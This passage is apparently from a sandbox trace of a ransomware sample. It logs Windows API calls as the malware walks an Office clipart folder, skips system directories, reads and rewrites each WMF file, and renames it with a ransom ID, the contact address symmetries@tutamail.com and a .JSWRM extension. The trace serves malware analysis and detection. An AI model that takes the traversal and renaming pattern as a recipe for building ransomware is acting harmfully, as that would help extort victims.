| out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.628] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x11000, lpOverlapped=0x0) returned 1 [0088.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.629] CloseHandle (hObject=0x314) returned 1 [0088.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0088.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0088.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0088.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0088.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0088.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.630] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0251007.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0251007.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0088.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.630] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf34834b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf34834b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf34834b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0252629.WMF", cAlternateFileName="")) returned 1 [0088.631] lstrcmpiW (lpString1="J0252629.WMF", lpString2=".") returned 1 [0088.631] lstrcmpiW (lpString1="J0252629.WMF", lpString2="..") returned 1 [0088.631] lstrcmpiW (lpString1="J0252629.WMF", lpString2="...") returned 1 [0088.631] lstrcmpiW (lpString1="J0252629.WMF", lpString2="windows") returned -1 [0088.631] lstrcmpiW (lpString1="J0252629.WMF", lpString2="recovery") returned -1 [0088.631] lstrcmpiW (lpString1="J0252629.WMF", lpString2="perflogs") returned -1 [0088.631] lstrcmpiW (lpString1="J0252629.WMF", lpString2="documents and settings") returned 1 [0088.631] lstrcmpiW (lpString1="J0252629.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.631] lstrcmpiW (lpString1="J0252629.WMF", lpString2="system volume information") returned -1 [0088.631] lstrcmpiW (lpString1="J0252629.WMF", lpString2="msocache") returned -1 [0088.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0088.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0252629.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0252629.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0252629.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0088.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0088.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0252629.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0252629.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0252629.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0088.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252629.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.632] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2786) returned 1 [0088.632] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xae0) returned 0x23fc98 [0088.632] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xae0, lpOverlapped=0x0) returned 1 [0088.637] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.637] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xae0, lpOverlapped=0x0) returned 1 [0088.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0088.637] CloseHandle (hObject=0x314) returned 1 [0088.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0088.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0088.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0088.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0088.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0088.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.638] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252629.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252629.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252629.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0088.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.639] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf2fbd2e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf2fbd2e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf34834b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf56, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0252669.WMF", cAlternateFileName="")) returned 1 [0088.639] lstrcmpiW (lpString1="J0252669.WMF", lpString2=".") returned 1 [0088.639] lstrcmpiW (lpString1="J0252669.WMF", lpString2="..") returned 1 [0088.639] lstrcmpiW (lpString1="J0252669.WMF", lpString2="...") returned 1 [0088.639] lstrcmpiW (lpString1="J0252669.WMF", lpString2="windows") returned -1 [0088.639] lstrcmpiW (lpString1="J0252669.WMF", lpString2="recovery") returned -1 [0088.639] lstrcmpiW (lpString1="J0252669.WMF", lpString2="perflogs") returned -1 [0088.639] lstrcmpiW (lpString1="J0252669.WMF", lpString2="documents and settings") returned 1 [0088.639] lstrcmpiW (lpString1="J0252669.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.639] lstrcmpiW (lpString1="J0252669.WMF", lpString2="system volume information") returned -1 [0088.639] lstrcmpiW (lpString1="J0252669.WMF", lpString2="msocache") returned -1 [0088.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0088.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0252669.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0252669.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0252669.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0088.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0088.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0252669.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0252669.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0252669.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0088.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0088.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252669.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.640] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3926) returned 1 [0088.640] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf50) returned 0x23fc98 [0088.640] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf50, lpOverlapped=0x0) returned 1 [0088.642] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.642] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf50, lpOverlapped=0x0) returned 1 [0088.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0088.642] CloseHandle (hObject=0x314) returned 1 [0088.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0088.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0088.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0088.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0088.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0088.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0088.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.643] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252669.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0252669.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0252669.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0088.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0088.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0088.643] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed05f07, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xed05f07, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf34834b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf6a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0278702.WMF", cAlternateFileName="")) returned 1 [0088.643] lstrcmpiW (lpString1="J0278702.WMF", lpString2=".") returned 1 [0088.643] lstrcmpiW (lpString1="J0278702.WMF", lpString2="..") returned 1 [0088.643] lstrcmpiW (lpString1="J0278702.WMF", lpString2="...") returned 1 [0088.643] lstrcmpiW (lpString1="J0278702.WMF", lpString2="windows") returned -1 [0088.643] lstrcmpiW (lpString1="J0278702.WMF", lpString2="recovery") returned -1 [0088.644] lstrcmpiW (lpString1="J0278702.WMF", lpString2="perflogs") returned -1 [0088.644] lstrcmpiW (lpString1="J0278702.WMF", lpString2="documents and settings") returned 1 [0088.644] lstrcmpiW (lpString1="J0278702.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.644] lstrcmpiW (lpString1="J0278702.WMF", lpString2="system volume information") returned -1 [0088.644] lstrcmpiW (lpString1="J0278702.WMF", lpString2="msocache") returned -1 [0088.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0278702.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0278702.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0278702.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0088.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0278702.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0278702.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0278702.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0088.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0088.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0278702.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.645] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3946) returned 1 [0088.645] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf60) returned 0x23fc98 [0088.645] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf60, lpOverlapped=0x0) returned 1 [0088.647] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.647] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf60, lpOverlapped=0x0) returned 1 [0088.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0088.647] CloseHandle (hObject=0x314) returned 1 [0088.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0088.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0088.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0088.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0088.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0088.648] HeapFree (in: hHeap=0x1e0000, 